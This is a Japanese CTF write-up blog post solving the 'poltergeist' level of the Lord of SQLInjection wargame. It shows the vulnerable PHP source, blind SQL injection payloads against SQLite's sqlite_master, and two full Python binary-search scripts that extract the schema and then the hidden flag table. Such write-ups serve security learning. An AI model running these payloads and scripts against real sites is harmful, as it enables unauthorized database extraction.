はまやんはまやんはまやん

hamayanhamayan's blog

poltergeist [LORD OF SQLINJECTION]

Lord of SQLInjection

<?php
include "./config.php";
login_chk();
$db = sqlite_open("./db/poltergeist.db");
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";

if($poltergeistFlag === $_GET['pw']) solve("poltergeist");// Flag is in `flag_{$hash}` table, not in `member` table. Let's look over whole of the database.
highlight_file(__FILE__);

特徴は以下。

  • SQLite
  • pwが入力可能
  • flag_{$hash}というテーブルがあるので、その中身に書いてあるフラグを取ってくる

Blind SQL Injectionしよう

Blind SQL Injectionでテーブル情報を抜き出す

SELECT group_concat(sql) FROM sqlite_masterでテーブル情報が全部抜き出せるので、
全部抜き出してくる。

以下でテーブル情報の長さを抜き取る。
' or {md} <= length((SELECT group_concat(sql) FROM sqlite_master)) --
以下でテーブル情報の中身を抜き取る。
' or id='admin' and {md} <= unicode(substr((SELECT group_concat(sql) FROM sqlite_master),{i+1},1)) --

import requests

url = "https://los.rubiya.kr/chall/poltergeist_a62.php"
cookie = {'PHPSESSID': 'f7efq5'}

def check(data) -> bool:
    return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data)

ok = 0
ng = 120

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = f"' or {md} <= length((SELECT group_concat(sql) FROM sqlite_master)) --"
    res = requests.get(url, params={'pw': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 256

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = f"' or id='admin' and {md} <= unicode(substr((SELECT group_concat(sql) FROM sqlite_master),{i+1},1)) --"
        res = requests.get(url, params={'pw': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")

すると

CREATE TABLE "member" (
        `id`    TEXT,
        `pw`    TEXT
),CREATE TABLE `flag_70c81d99` (
        `flag_0876285c` TEXT
)

こんな感じに出てくるので、このテーブルの中身を改めて抜き出す。

Blind SQL Injectionでテーブルの中身を抜き出す

SELECT group_concat(flag_0876285c) FROM flag_70c81d99で抜き出してこよう。

以下で長さを抜き取る。
' or {md} <= length((SELECT group_concat(flag_0876285c) FROM flag_70c81d99)) --
以下で中身を抜き取る。
' or id='admin' and {md} <= unicode(substr((SELECT group_concat(flag_0876285c) FROM flag_70c81d99),{i+1},1)) --

import requests

url = "https://los.rubiya.kr/chall/poltergeist_a6d.php"
cookie = {'PHPSESSID': 'hn7efq5'}

def check(data) -> bool:
    return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data)

ok = 0
ng = 120

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = f"' or {md} <= length((SELECT group_concat(flag_0876285c) FROM flag_70c81d99)) --"
    res = requests.get(url, params={'pw': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 256

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = f"' or id='admin' and {md} <= unicode(substr((SELECT group_concat(flag_0876285c) FROM flag_70c81d99),{i+1},1)) --"
        res = requests.get(url, params={'pw': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")